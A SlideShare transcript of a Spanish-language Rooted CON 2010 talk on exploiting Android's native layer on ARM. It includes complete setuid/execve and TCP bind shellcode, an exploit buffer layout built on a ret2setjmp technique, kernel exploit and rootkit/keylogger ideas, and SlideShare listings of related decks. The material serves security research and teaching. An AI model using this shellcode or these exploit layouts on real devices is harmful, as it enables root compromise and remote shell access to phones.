SlideShare una empresa de Scribd logo
Seguridad y explotación nativa en Android
            Smashing the droid for fun and profit




Congreso de Seguridad ~ Rooted CON’2010             1
Agenda

•   Introducción
•   Shellcoding
•   Buffer overflows
•   Kernel land
•   Post explotación




Congreso de Seguridad ~ Rooted CON’2010   2
Smart Phones

   • Definición difusa:
        – Terminal móvil
        – Sistema operativo complejo
        – Funciones avanzadas


   • Sistemas operativos:
        – Symbian, iPhoneOS, Blackberry, Android,
          PalmOS, Maemo Linux


Congreso de Seguridad ~ Rooted CON’2010             3
¿Por qué son interesantes?

   •   Cada vez son más similares a un ordenador
   •   Robo de datos personales
   •   Suplantación de identidades
   •   Conexión permanente 3G
   •   Sistemas con poco tiempo en el mercado
   •   Baja frecuencia de actualización




Congreso de Seguridad ~ Rooted CON’2010            4
Introducción a Android

   • OS para smart phones y dispositivos móviles

   • Basado en Linux para ARM

   • Android SDK basado en Java
        – Máquina virtual Dalvik
        – Soporte JNI para código nativo
        – Muchas librerías nativas (webkit, rendering, …)


Congreso de Seguridad ~ Rooted CON’2010                     5
Arquitectura de Android




Congreso de Seguridad ~ Rooted CON’2010   6
Modelo de seguridad

   • Sandboxing basado en permisos Unix
        – UID distinto por app
        – Permisos en el sistema de ficheros


   • Apps instaladas desde Android Marketplace
        – Auto firmadas por el autor


   • ¿ Java = plataforma segura?
        – Librerías nativas, kernel, etc
Congreso de Seguridad ~ Rooted CON’2010          7
Agenda

•   Introducción
•   Shellcoding
•   Buffer overflows
•   Kernel land
•   Post explotación




Congreso de Seguridad ~ Rooted CON’2010   8
Introducción a ARM

   • Copa el mercado de los dispositivos móviles

   • Relación consumo / prestaciones

   • Arquitectura licenciable (ARM IP)

   • Juego instrucciones RISC 32 bits, Bi-endian
        – Posibilidades de extensión

Congreso de Seguridad ~ Rooted CON’2010            9
ARM vs Thumb mode

   •   Desde la versión ARM7TDMI
   •   Thumb: versión reducida de la CPU a 16 bits
   •   Mappeado con las instrucciones de 32 bits
   •   Mejora la densidad de código
   •   Menor consumo de memoria
   •   Alineamiento
        – Modo ARM: 4 bytes
        – Modo Thumb: 2 bytes

Congreso de Seguridad ~ Rooted CON’2010              10
Peculiaridades de Thumb

   • Registros de propósito general de r0 a r7
   • Menos instrucciones disponibles
   • Mnemónicos push/pop
   • Inmediato más grande posible = 255
   • Limitaciones en el uso de registros
     desplazados
   • { r13, r14, r15, r16 } = { sp, lr, pc, cpsr }


Congreso de Seguridad ~ Rooted CON’2010              11
ARM ↔ Thumb

   • Bit T del CPSR a 1 indica modo Thumb
   • Branch Exchange (bx addr)
        – T = <LSB addr>
        – Compilar usando –mthumb-interwork
                             .globl main
                             main:
                             .CODE 32
                                     add r2,pc,#1
                                     bx r2
                             .CODE 16
                             thumb:


Congreso de Seguridad ~ Rooted CON’2010             12
ARM ABI

• Llamadas a funciones con bl
     – Dirección retorno en lr
     – Función llamada debe preservarlo


• Muchas posibilidades para return
  – mov pc,lr / ldm sp,{pc}/…


• Parámetros en r0,r1,…

Congreso de Seguridad ~ Rooted CON’2010   13
Syscalls en Linux/ARM

   • Definidas en el kernel
        – /usr/src/linux/arch/arm/include/asm/unistd.h


   • En general coinciden con x86

   • Syscalls extra para socket
        – En lugar de socketcall



Congreso de Seguridad ~ Rooted CON’2010                  14
Llamadas a syscalls

   •   Parámetros en r0, r1, r2, ...
   •   Número de la llamada en r7
   •   Saltamos al kernel con svc
   •   Valor de retorno en r0

   int open(const char *camino, int flags, mode_t modo);
    r0 r7                  r0         r1           r2




Congreso de Seguridad ~ Rooted CON’2010                    15
Uso de sockets

    @ -- socket(2,1,0) --
    @ parameters
    eor r5, r5
    push {r5}                             En otras arquitecturas:
    add r5, r5, #1
    push {r5}                             - Funciones en “net.h”
    add r5, r5, #1
    push {r5}                             - r0 = función
    @ sys_call
    mov r0, #1                            - r1 = parámetros
    mov r1, sp
    mov r7, #102                          - Llamada Socketcall
    svc 0x00000080
    mov r4, r0



Congreso de Seguridad ~ Rooted CON’2010                             16
Uso de sockets

    @ -- socket(2,1,0) --
    @ parameters
    eor r5, r5
    push {r5}                             @ -- socket(2,1,0) -
    add r5, r5, #1                          -
    push {r5}                             mov r0, #2
    add r5, r5, #1                        mov r1, #1
    push {r5}                             eor r2, r2
    @ sys_call                            mov r7, #250
    mov r0, #1                            add r7, #31 @ 281
    mov r1, sp                            svc 0x00000080
    mov r7, #102                          mov r4, r0
    svc 0x00000080
    mov r4, r0



Congreso de Seguridad ~ Rooted CON’2010                          17
Compatibilidad con iPhone OS

   • También utiliza ARM
        – El número syscall puede variar
        – Se debe poner en r12


   • Shellcodes multiplataforma!

   • Número syscalls en:
        http://theiphonewiki.com/wiki/index.php?title=Kernel_Syscalls



Congreso de Seguridad ~ Rooted CON’2010                                 18
Shellcode execve (I)
               .globl main
               main:
               .CODE 32
                                   add r2,pc,#1
                                   bx r2
               .CODE 16
               thumb:
                                   @setuid(0)
                                   eor     r0,r0
                                   movs    r7, #23
                                   svc     0x00000080

                                   @Prepare execve args
                                   adr     r0, string
                                   adr     r5, string2
                                   eor     r6, r6
                                   str     r6, [r5]
Congreso de Seguridad ~ Rooted CON’2010                   19
Shellcode execve (II)


                      push     {r6}
                      push     {r0}
                      mov      r1, sp
                      eor      r2, r2, r2
                @call execve()
                      movs     r7, #11
                      svc      0x00000080
              .align 2
              string:
                      .ascii "///system/bin/sh"
              string2:
                      .ascii "xAAxAAxAAxAA"




Congreso de Seguridad ~ Rooted CON’2010           20
TCP Bind shellcode (I)
              @ socket()
                mov   r0, #2
                mov   r1, #1
                eor   r2, r2
                mov   r7, #250
                add   r7, #31
                svc   0x00000080
                mov   r4, r0
                @ preparing sockaddr_in
                eor   r5, r5
                push {r5}
                push {r5}
                push {r5}
                mov   r5, #7
                lsl   r5, #8
                add   r5, #7


Congreso de Seguridad ~ Rooted CON’2010   21
TCP Bind shellcode (II)
                  lsl   r5, #16
                  add   r5, #2
                  push {r5}
                  @bind()
                  mov   r0, r4
                  mov   r1, sp
                  mov   r2, #16
                  mov   r7, #250
                  add   r7, #32
                  svc   0x00000080
                  @listen()
                  mov   r0, r4
                  mov   r1, #1
                  mov   r7, #250
                  add   r7, #34
                  svc   0x00000080


Congreso de Seguridad ~ Rooted CON’2010   22
TCP Bind shellcode (III)

                  @accept()
                  mov   r0, r4
                  eor   r1, r1
                  eor   r2, r2
                  mov   r7, #250
                  add   r7, #35
                  svc   0x00000080
                  mov   r6,r0

                  @dup2    stdin
                  mov      r0, r6
                  eor      r1, r1
                  mov      r7, #63
                  svc      0x00000080



Congreso de Seguridad ~ Rooted CON’2010   23
TCP Bind shellcode (IV)

                 @dup2     stdout
                 mov       r0, r6
                 mov       r1, #1
                 mov       r7, #63
                 svc       0x00000080

                 @dup2     stderr
                 mov       r0, r6
                 mov       r1, #2
                 mov       r7, #63
                 svc       0x00000080

              @Execve shellcode appended here



Congreso de Seguridad ~ Rooted CON’2010         24
Módulos para Metasploit

   • Nuevas shellcodes para Android
        – execve(/system/bin/sh)
        – TCP Bind shellcode


   • Encoder XOR para ARM LE

   • Scripts de los ejemplos posteriores



Congreso de Seguridad ~ Rooted CON’2010    25
Agenda

•   Introducción
•   Shellcoding
•   Buffer overflows
•   Kernel land
•   Post explotación




Congreso de Seguridad ~ Rooted CON’2010   26
Mapa de memoria

# cat /proc/self/maps
00008000-00019000 r-xp               00000000 1f:00 348     /system/bin/...
00019000-0001a000 rw-p               00011000 1f:00 348     /system/bin/...
0001a000-00020000 rwxp               0001a000 00:00 0       [heap]
[...]
afe00000-afe39000 r-xp               00000000   1f:00   478 /system/lib/...
afe39000-afe3c000 rw-p               00039000   1f:00   478 /system/lib/...
afe3c000-afe47000 rw-p               afe3c000   00:00   0
b0000000-b0013000 r-xp               00000000   1f:00   332 /system/bin/...
b0013000-b0014000 rw-p               00013000   1f:00   332 /system/bin/...
b0014000-b001a000 rwxp               b0014000   00:00   0
beebe000-beed3000 rwxp               befeb000   00:00   0 [stack] <-- ASLR
#



Congreso de Seguridad ~ Rooted CON’2010                                  27
Mapa de memoria - Implicaciones

   • Direcciones en la pila no predecibles
        – Difícil saltar directamente a buffers ahí


   • Pila y Heap mapeadas como rwx
        – Ejecución de código posible ☺


   • Librerías en direcciones predecibles
        – Posibilidad de ejecutar su código
        – Paso de parámetros plantea problemas
Congreso de Seguridad ~ Rooted CON’2010               28
Buffer overflows - Stack

   • Programa de ejemplo:
        – Bucle esperando conexiones
        – Para cada conexión:
             • Leer entero de 32 bits X
             • Leer X bytes en un buffer de tamaño fijo


        – Compilado con la toolchain de Android
             • Ver http://source.android.com




Congreso de Seguridad ~ Rooted CON’2010                   29
Buffer overflow - Stack

   00008520 <read_msg>:
       8520: b5f0 push {r4, r5, r6, r7, lr}
       8522: 4d12 ldr r5,[pc, #72] (856c+<.text+0x8c>)
       8524: b093 sub     sp, #76
       8526: a911 add     r1, sp, #68
       [...]
       8568: b013 add     sp, #76
         856a:       bdf0      pop        {r4, r5, r6, r7, pc}   !!


  • Controlamos 4 registros generales y el PC


Congreso de Seguridad ~ Rooted CON’2010                               30
Buffer overflow - Stack


   • Explotación
        – ret2libc : Paso de registros en parámetros?
        – jmp/branch sp : No encontrado inicialmente
        – ret2setjmp
             • setjmp copia registros en memoria
             • Podremos elegir dónde y saltar a ellos
             • Pero toma los parámetros en registros... o no?



Congreso de Seguridad ~ Rooted CON’2010                         31
Desensamblado de setjmp

   (gdb) disass setjmp
   Dump of assembler code for function setjmp:
   0xafe0dd20 <setjmp+0>: push     {r0, lr}
   0xafe0dd24 <setjmp+4>: mov      r0, #0 ; 0x0
   0xafe0dd28 <setjmp+8>: blx      0xafe12094 <sigblock>
   0xafe0dd2c <setjmp+12>: mov     r1, r0
   0xafe0dd30 <setjmp+16>: pop     {r0, lr} !!
   0xafe0dd34 <setjmp+20>: str     r1, [r0, #100]
   0xafe0dd38 <setjmp+24>: ldr     r1, [pc, #16]   ;
   0xafe0dd50 <setjmp+48>
   0xafe0dd3c <setjmp+28>: str     r1, [r0], #4
   0xafe0dd40 <setjmp+32>: add     r0, r0, #52     ; 0x34
   0xafe0dd44 <setjmp+36>: stm r0, {r4-r12, sp, lr} !!
   0xafe0dd48 <setjmp+40>: mov     r0, #0 ; 0x0
   0xafe0dd4c <setjmp+44>: bx      lr


Congreso de Seguridad ~ Rooted CON’2010                     32
Buffer overflows - ret2setjmp

   • La técnica:
        –   Meter stub en registros controlados
        –   Salto a setjmp+0x10
        –   Retorno a los registros controlados
        –   Repetir si necesitamos más código
   • Limitaciones
        – Necesitamos controlar al menos un registro
        – Necesitamos setjmp en dirección predecible
        – Necesitamos región rwx para poner stub

Congreso de Seguridad ~ Rooted CON’2010                33
Buffer overflows – Evil buffer

   • En nuestro caso controlamos r4-r7




Congreso de Seguridad ~ Rooted CON’2010   34
Buffer overflows – Evil buffer

   • En nuestro caso controlamos r4-r7

       <padding> -> Rellena el buffer
       <b sp><b sp><b sp><b sp> --> r4-r7
       <0xafe0dd30> --> setjmp+0x10
       <destino><destino+offset_r4> --> r0,lr
       <shellcode> --> evil shellcode ☺




Congreso de Seguridad ~ Rooted CON’2010         35
Buffer overflows - Stack

   • ¡¡Demo!!




Congreso de Seguridad ~ Rooted CON’2010   36
Buffer overflows - ret2libc

   • Reutilizaremos la técnica anterior
        – Código en memoria con setjmp
             • Parámetros a registros
             • Llamadas a libc


   • Podemos encadenar setjmp’s
        – Más código controlable
        – Puede que solo controlemos un registro



Congreso de Seguridad ~ Rooted CON’2010            37
Buffer overflows - ret2libc

   • Demo
        – Usaremos mprotect para hacer pila no accesible
             • El exploit resulta en un segfault
             • Si la pila fuera NX, la podríamos hacer RWX

 <pop {r0,r1,r2,r3}><and r0,r0,sp><blx r3><b sp>
 <0xafe0dd30><destino><destino+offset_r4>
 <PAGE_SHIFT><0x01><0x00><mprotect>
 <shellcode>




Congreso de Seguridad ~ Rooted CON’2010                      38
Buffer overflows - ret2libc

   • ¡¡Demo!!




Congreso de Seguridad ~ Rooted CON’2010   39
Buffer overflows - Heap

   • Bionic libc incorpora DLMalloc 2.8.4
        – Listas enlazadas para chunks pequeños
        – Árboles binarios para chunks medianos
        – Chunks grandes se reservan con mmap
   • Seguridad
        – Safe unlinking
        – ptr > mmap_least_addr antes de usarlo
        – Otros…
   • No conocemos técnica genérica
Congreso de Seguridad ~ Rooted CON’2010           40
Buffer overflows - Heap

   • ¡¡Demo!!




Congreso de Seguridad ~ Rooted CON’2010   41
Agenda

•   Introducción
•   Shellcoding
•   Buffer overflows
•   Kernel land
•   Post explotación




Congreso de Seguridad ~ Rooted CON’2010   42
Kernel – Fallos típicos

   • NULL ptr dereference
        – Binario con sección mapeada en NULL
             • mmap_min_addr protege frente a ello
             • Ver exploit sock_sendpage() de Zinx


   • Buffer overflows
        – Stack: retorno a función en userspace
        – Slab: rellenar slab + overflow + dereference
             • Ver paper en Phrack #64

Congreso de Seguridad ~ Rooted CON’2010                  43
Kernel – Fallos típicos

   • Write-what-where
        – Escritura en dirección controlable
        – Contenidos controlados o no
        – ¿Qué sobrescribimos?


   • Explotando write-what-where’s
        – Tablas del kernel
        – Tablas específicas de la arquitectura
        –…

Congreso de Seguridad ~ Rooted CON’2010           44
ARM - Excepciones

   • Tabla de vectores de excepción
        – Instrucciones a ejecutar en caso de excepción




Congreso de Seguridad ~ Rooted CON’2010                   45
EVT en Android

   • EVT puede estar en 0x0000000 o 0xFFFF000
        – Linux usa 0xFFFF0000

   (gdb) x/8i 0xFFFF0000
   0xffff0000:   svc 0x009f0000
   0xffff0004:   b   0xffff0380
   0xffff0008:   ldr pc, [pc, #1040]; 0xffff0420
   0xffff000c:   b   0xffff0300
   0xffff0010:   b   0xffff0280
   0xffff0014:   b   0xffff0404
   0xffff0018:   b   0xffff0200
   0xffff001c:   b   0xffff0400

Congreso de Seguridad ~ Rooted CON’2010            46
EVT en Android

   • Instrucción branch
        – Desplazamiento máximo 24 bits
        – Espacio de usuario demasiado lejos!


   • Sigamos investigando…
        – Veamos qué pasa ante instrucciones ilegales




Congreso de Seguridad ~ Rooted CON’2010                 47
EVT en Android
   0xffff0380:                 stmia sp, {r0, lr}
   0xffff0384:                 mrs lr, SPSR
   0xffff0388:                 str lr, [sp, #8]
   0xffff038c:                 mrs r0, CPSR
   0xffff0390:                 eor r0, r0, #8 ; 0x8
   0xffff0394:                 msr SPSR_fsxc, r0
   0xffff0398:                 and lr, lr, #15    ; 0xf
   0xffff039c:                 mov r0, sp
   0xffff03a0:                 ldr lr, [pc, lr, lsl #2]
   0xffff03a4:                 movs    pc, lr
   0xffff03a8:                 0xc0023c20 <__und_usr>
   0xffff03ac:
   0xffff03b0:
   0xffff03b4:
                               0xc0023970 <__und_invalid>
                               0xc0023970 <__und_invalid>
                               0xc0023a60 <__und_svc>
                                                            !
Congreso de Seguridad ~ Rooted CON’2010                         48
Explotando write-what-where

   • Idea
        – Sobrescribir handler de instrucción ilegal
             • Apuntar a nuestro propio código


        – Ejecutar instrucción ilegal
             • Se ejecuta nuestro código


        – Dar privilegios y restaurar handler



Congreso de Seguridad ~ Rooted CON’2010                49
Agenda

•   Introducción
•   Shellcoding
•   Buffer overflows
•   Kernel land
•   Post explotación




Congreso de Seguridad ~ Rooted CON’2010   50
Got root! Now what?

   • Rootkits
        – Mantener acceso al sistema
        – Ocultar presencia del atacante


   • Rootkits en Linux
        – Generalmente inyectan LKMs
             • Junto con app en user-space




Congreso de Seguridad ~ Rooted CON’2010      51
Syscall hooking

   • Hooking as usual
        –   sys_call_table hook
        –   Parchear sys_call_handler
        –   Parchear syscall
        –   …


   • Vectores de excepción
        – Modificar vector SVC


Congreso de Seguridad ~ Rooted CON’2010   52
Android keylogger

   • Teclado virtual
        – Driver registra handler para IRQ #16
        – Lee keycode y lo registra en el kernel


   • Opciones:
        – Modificar irq_handlers[]
        – Modificar código del driver
        – Modificar vector de excepción


Congreso de Seguridad ~ Rooted CON’2010            53
Post-explotación

        ¡Demos!




Congreso de Seguridad ~ Rooted CON’2010   54
Rootkit más silencioso

   • ARM permite poner la EVT en 0x0000000
        – Un bit en el registro de control (CR) del
          coprocesador que controla el sistema (SCC)
          define dónde está
   • Un rootkit podría duplicarla
        – Interceptar syscalls interesantes
        – Redirigir el resto
   • Cloaker implementa esta idea
        – Paper en http://srgsec.cs.illinois.edu/cloaker.pdf

Congreso de Seguridad ~ Rooted CON’2010                        55
¡Gracias por vuestra atención!


 Javier Moreno                                              Eloi Sanfèlix
 vierito5@gmail.com                        eloi@limited-entropy.com
 http://vierito.es                        http://limited-entropy.com

 Gracias a M.A. Mateo y A. Perles, DISCA UPV, por prestarnos el hardware

Congreso de Seguridad ~ Rooted CON’2010                                    56

Más contenido relacionado

La actualidad más candente

11.6.1
11.6.111.6.1
11.6.1
victdiazm
 
Fundamentos de RPKI y BGP
Fundamentos de RPKI y BGPFundamentos de RPKI y BGP
Fundamentos de RPKI y BGP
Paulo Colomés
 
Internet
InternetInternet
Internet
miss051
 
Zocalos
ZocalosZocalos
Zocalos
dieguiito02
 
Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]
Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]
Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]
RootedCON
 
20170530 VoIP Teoría General
20170530  VoIP Teoría General20170530  VoIP Teoría General
20170530 VoIP Teoría General
Luis Castro
 
4 tema de exposicion
4 tema de exposicion 4 tema de exposicion
4 tema de exposicion
JuanNoa9
 
Presentacion bitup alicante 2018
Presentacion bitup alicante 2018Presentacion bitup alicante 2018
Presentacion bitup alicante 2018
Buenaventura Salcedo Santos-Olmo
 
Tipos de Malware
Tipos de MalwareTipos de Malware
Tipos de Malware
edelahozuah
 
5.2.1.8 laboratorio ccna
5.2.1.8 laboratorio ccna5.2.1.8 laboratorio ccna
5.2.1.8 laboratorio ccna
timmaujim
 
Nmap, the free scanner
Nmap, the free scannerNmap, the free scanner
Nmap, the free scanner
Dani Gutiérrez Porset
 
Nat
NatNat
Nat
1 2d
 
arquitectura de-routers
arquitectura de-routersarquitectura de-routers
arquitectura de-routers
Karen Cerdo Conejo
 
Seguridad layer 2
Seguridad layer 2Seguridad layer 2
Seguridad layer 2
s3m1llon
 
Proyecto Taller de Mantenimiento 2ºIF Bachi ITS Uruguay
Proyecto Taller de Mantenimiento 2ºIF Bachi ITS UruguayProyecto Taller de Mantenimiento 2ºIF Bachi ITS Uruguay
Proyecto Taller de Mantenimiento 2ºIF Bachi ITS Uruguay
Emiliano Gonzalez
 
Practica 1 eigrp
Practica 1 eigrpPractica 1 eigrp
Practica 1 eigrp
w2k111984
 
Curso de microcontroladores capitulo 02
Curso de microcontroladores capitulo 02Curso de microcontroladores capitulo 02
Curso de microcontroladores capitulo 02
Hamiltonn Casallas
 
Bases de datos
Bases de datosBases de datos
Bases de datos
issues6666
 

La actualidad más candente (18)

11.6.1
11.6.111.6.1
11.6.1
 
Fundamentos de RPKI y BGP
Fundamentos de RPKI y BGPFundamentos de RPKI y BGP
Fundamentos de RPKI y BGP
 
Internet
InternetInternet
Internet
 
Zocalos
ZocalosZocalos
Zocalos
 
Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]
Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]
Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi [Rooted CON 2014]
 
20170530 VoIP Teoría General
20170530  VoIP Teoría General20170530  VoIP Teoría General
20170530 VoIP Teoría General
 
4 tema de exposicion
4 tema de exposicion 4 tema de exposicion
4 tema de exposicion
 
Presentacion bitup alicante 2018
Presentacion bitup alicante 2018Presentacion bitup alicante 2018
Presentacion bitup alicante 2018
 
Tipos de Malware
Tipos de MalwareTipos de Malware
Tipos de Malware
 
5.2.1.8 laboratorio ccna
5.2.1.8 laboratorio ccna5.2.1.8 laboratorio ccna
5.2.1.8 laboratorio ccna
 
Nmap, the free scanner
Nmap, the free scannerNmap, the free scanner
Nmap, the free scanner
 
Nat
NatNat
Nat
 
arquitectura de-routers
arquitectura de-routersarquitectura de-routers
arquitectura de-routers
 
Seguridad layer 2
Seguridad layer 2Seguridad layer 2
Seguridad layer 2
 
Proyecto Taller de Mantenimiento 2ºIF Bachi ITS Uruguay
Proyecto Taller de Mantenimiento 2ºIF Bachi ITS UruguayProyecto Taller de Mantenimiento 2ºIF Bachi ITS Uruguay
Proyecto Taller de Mantenimiento 2ºIF Bachi ITS Uruguay
 
Practica 1 eigrp
Practica 1 eigrpPractica 1 eigrp
Practica 1 eigrp
 
Curso de microcontroladores capitulo 02
Curso de microcontroladores capitulo 02Curso de microcontroladores capitulo 02
Curso de microcontroladores capitulo 02
 
Bases de datos
Bases de datosBases de datos
Bases de datos
 

Destacado

Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01
Eventos Creativos
 
54. OWASP Mobile Top Ten
54. OWASP Mobile Top Ten54. OWASP Mobile Top Ten
54. OWASP Mobile Top Ten
GeneXus
 
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
woebegonesinger93
 
Informe Cuatrimestral de Seguridad Informática 2014. ESET España
Informe Cuatrimestral de Seguridad Informática 2014. ESET España Informe Cuatrimestral de Seguridad Informática 2014. ESET España
Informe Cuatrimestral de Seguridad Informática 2014. ESET España
ESET España
 
Android
AndroidAndroid
Android in practice
Android in practiceAndroid in practice
Android in practice
Jose Manuel Ortega Candel
 
Testing Android Security
Testing Android SecurityTesting Android Security
Testing Android Security
Jose Manuel Ortega Candel
 
Empresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malwareEmpresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malware
David Thomas
 

Destacado (8)

Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01
 
54. OWASP Mobile Top Ten
54. OWASP Mobile Top Ten54. OWASP Mobile Top Ten
54. OWASP Mobile Top Ten
 
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
Google Aumenta La Seguridad De La Tienda De Aplicaciones Android
 
Informe Cuatrimestral de Seguridad Informática 2014. ESET España
Informe Cuatrimestral de Seguridad Informática 2014. ESET España Informe Cuatrimestral de Seguridad Informática 2014. ESET España
Informe Cuatrimestral de Seguridad Informática 2014. ESET España
 
Android
AndroidAndroid
Android
 
Android in practice
Android in practiceAndroid in practice
Android in practice
 
Testing Android Security
Testing Android SecurityTesting Android Security
Testing Android Security
 
Empresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malwareEmpresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malware
 

Similar a Javier Moreno & Eloi Sanfélix - Seguridad y explotación nativa en Android [RootedCON 2010]

1. microcontrolador
1. microcontrolador1. microcontrolador
1. microcontrolador
David Narváez
 
pic16f877-con-mikroc.pdf
pic16f877-con-mikroc.pdfpic16f877-con-mikroc.pdf
pic16f877-con-mikroc.pdf
EdwingVelasquez4
 
Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)
Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)
Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)
Franz Amaya
 
Configurando Ospf Dr Y Bdr
Configurando Ospf Dr Y BdrConfigurando Ospf Dr Y Bdr
Configurando Ospf Dr Y Bdr
César Nuñez
 
Un breve viaje al baremetal hardware hacking
Un breve viaje al baremetal hardware hackingUn breve viaje al baremetal hardware hacking
Un breve viaje al baremetal hardware hacking
Javier Tallón
 
OpenMP.ppt
OpenMP.pptOpenMP.ppt
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xxCurso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Jose Manuel Mansilla Carrasco
 
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xxCurso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Jose Manuel Mansilla Carrasco
 
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xxCurso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xx
freddymadriz
 
Trabajo IOS de CISCO
Trabajo IOS de CISCOTrabajo IOS de CISCO
Trabajo IOS de CISCO
cyberleon95
 
Ejercicios ripv2
Ejercicios ripv2Ejercicios ripv2
Ejercicios ripv2
alejandro colan
 
Pic16f84(1)
Pic16f84(1)Pic16f84(1)
Pic16f84(1)
Erick Perez
 
programacion con microcontrolador pic 16f84
programacion con microcontrolador pic 16f84programacion con microcontrolador pic 16f84
programacion con microcontrolador pic 16f84
guestf09168b
 
Introducción a la programacion Pic16F84
Introducción a la programacion Pic16F84Introducción a la programacion Pic16F84
Introducción a la programacion Pic16F84
Daniel Remondegui
 
Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...
Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...
Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...
Alvaro Angel Romero Gandul
 
Redes 2 taller comandos router 2020-2
Redes 2   taller comandos router 2020-2Redes 2   taller comandos router 2020-2
Redes 2 taller comandos router 2020-2
Richard Eliseo Mendoza Gafaro
 
Introducción Arquitectura Microcontroladores.pdf
Introducción Arquitectura Microcontroladores.pdfIntroducción Arquitectura Microcontroladores.pdf
Introducción Arquitectura Microcontroladores.pdf
JuanCarlosPalazzani
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
RootedCON
 
Practica RIP v1 escenario a
Practica RIP v1  escenario aPractica RIP v1  escenario a
Practica RIP v1 escenario a
Alumic S.A
 
Reporte practica 6
Reporte practica 6Reporte practica 6
Reporte practica 6
Norma Mónica Fraire Osornio
 

Similar a Javier Moreno & Eloi Sanfélix - Seguridad y explotación nativa en Android [RootedCON 2010] (20)

1. microcontrolador
1. microcontrolador1. microcontrolador
1. microcontrolador
 
pic16f877-con-mikroc.pdf
pic16f877-con-mikroc.pdfpic16f877-con-mikroc.pdf
pic16f877-con-mikroc.pdf
 
Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)
Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)
Curso de lenguaje c para microcontroladores pic dia 1(2)(2)(2)(2)(2)(2)
 
Configurando Ospf Dr Y Bdr
Configurando Ospf Dr Y BdrConfigurando Ospf Dr Y Bdr
Configurando Ospf Dr Y Bdr
 
Un breve viaje al baremetal hardware hacking
Un breve viaje al baremetal hardware hackingUn breve viaje al baremetal hardware hacking
Un breve viaje al baremetal hardware hacking
 
OpenMP.ppt
OpenMP.pptOpenMP.ppt
OpenMP.ppt
 
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xxCurso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xx
 
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xxCurso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xx
 
Curso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xxCurso de programacion en c++ para microcontroladores pic 16 f87xx
Curso de programacion en c++ para microcontroladores pic 16 f87xx
 
Trabajo IOS de CISCO
Trabajo IOS de CISCOTrabajo IOS de CISCO
Trabajo IOS de CISCO
 
Ejercicios ripv2
Ejercicios ripv2Ejercicios ripv2
Ejercicios ripv2
 
Pic16f84(1)
Pic16f84(1)Pic16f84(1)
Pic16f84(1)
 
programacion con microcontrolador pic 16f84
programacion con microcontrolador pic 16f84programacion con microcontrolador pic 16f84
programacion con microcontrolador pic 16f84
 
Introducción a la programacion Pic16F84
Introducción a la programacion Pic16F84Introducción a la programacion Pic16F84
Introducción a la programacion Pic16F84
 
Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...
Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...
Integración de ROS (Robot Operating System) con las plataformas Arduino y Ras...
 
Redes 2 taller comandos router 2020-2
Redes 2   taller comandos router 2020-2Redes 2   taller comandos router 2020-2
Redes 2 taller comandos router 2020-2
 
Introducción Arquitectura Microcontroladores.pdf
Introducción Arquitectura Microcontroladores.pdfIntroducción Arquitectura Microcontroladores.pdf
Introducción Arquitectura Microcontroladores.pdf
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
